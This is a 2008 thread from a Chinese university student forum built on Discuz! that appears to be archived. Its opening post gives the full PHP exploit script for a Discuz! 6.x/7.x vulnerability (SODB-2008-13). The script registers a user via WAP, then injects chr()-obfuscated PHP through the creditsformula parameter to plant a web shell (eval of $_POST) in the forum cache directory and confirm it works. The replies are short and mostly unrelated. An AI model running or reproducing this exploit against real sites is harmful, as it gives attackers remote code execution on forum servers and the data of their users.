设为首页收藏本站
论坛任务切换到宽版

诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】»论坛 『 站务管理 』 社区事务 Discuz! 6.x/7.x SODB-2008-13 Exp
返回列表 发新帖
查看: 1211|回复: 5

Discuz! 6.x/7.x SODB-2008-13 Exp

[复制链接]
D.im
发表于 2008-11-15 15:16:08 | 显示全部楼层 |阅读模式
#!/usr/bin/php
<?php
/**
* Discuz! 6.x/7.x SODB-2008-13 Exp
* By www.80vul.com
* 文件中注释的变量值请自行修改
*/


$host = 'www.80vul.com';
// 服务器域名或IP
$path = '/discuz/';
// 程序所在的路径
$key  = 0;
// 上面的变量编辑好后,请将此处的值改为1

if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
exit("专业点好不,先看看里面的注释 -,-\n");

error_reporting(7);
ini_set('max_execution_time', 0);

$key = time();
$cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
$resp = send();

preg_match('/logout=yes&amp;formhash=[a-z0-9]{8}&amp;sid=([a-zA-Z0-9]{6})/', $resp, $sid);

if (!$sid)
exit("哦,大概是没有开启WAP注册吧 -,-\n");

$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
send();

$shell = 'http://'.$host.$path.'forumdata/cache/eval.php';

if (file_get_contents($shell) == '80vul')
exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t<?eval(\$_POST[c])?>\n别告诉我你不会用 -,-\n");
else
exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");

function send()
{
global $host, $path, $url, $cmd;

$data = "POST ".$path."wap/index.php  HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
$data .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>
Discuz, Exp

相关帖子
回复

使用道具 举报

idealin
发表于 2008-11-15 15:19:57 | 显示全部楼层
:cattle 。。。。。这是什么。?
回复 支持 反对

使用道具 举报

Admin
发表于 2008-11-15 15:26:34 | 显示全部楼层
谢谢LZ提醒。
回复 支持 反对

使用道具 举报

Jarvis
发表于 2008-11-15 16:36:34 | 显示全部楼层
传送中的wap漏洞攻击,删除用户数据?
回复 支持 反对

使用道具 举报

Jarvis
发表于 2008-11-15 16:41:29 | 显示全部楼层
楼主反映的问题不知道于本人知道的一样是否?
以前发现个问题,随后因为些事忘了,现在想起了。
问题陈述如图:

问题在多出地方出现,现在举个例子
我在游戏里面查看游戏排名。
看到结果如下,我点击第一名,因为我对他感到好奇,我想点下他,了解具体情况
[pp=single_ubb,514,176,1001e3eq651da]sid=190903&surl=http://chengyi.org/bbs/&url=http://p.qihoo.com/pic/1001e3eq651da&rurl=http://yp.qihoo.com/pic/1702333q13b8a.jpg&rurl_w=514&rurl_h=176[/pp]

然后出现以下页面
[pp=single_ubb,700,165,1802030q23861]sid=190903&surl=http://chengyi.org/bbs/&url=http://p.qihoo.com/pic/1802030q23861&rurl=http://yp.qihoo.com/pic/1504e1cqad48.jpg&rurl_w=1084&rurl_h=257[/pp]
回复 支持 反对

使用道具 举报

猪头
发表于 2008-11-16 18:07:40 | 显示全部楼层
那个是游戏插件没设置好。?
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2024-5-1 02:50 , Processed in 0.060729 second(s), 24 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表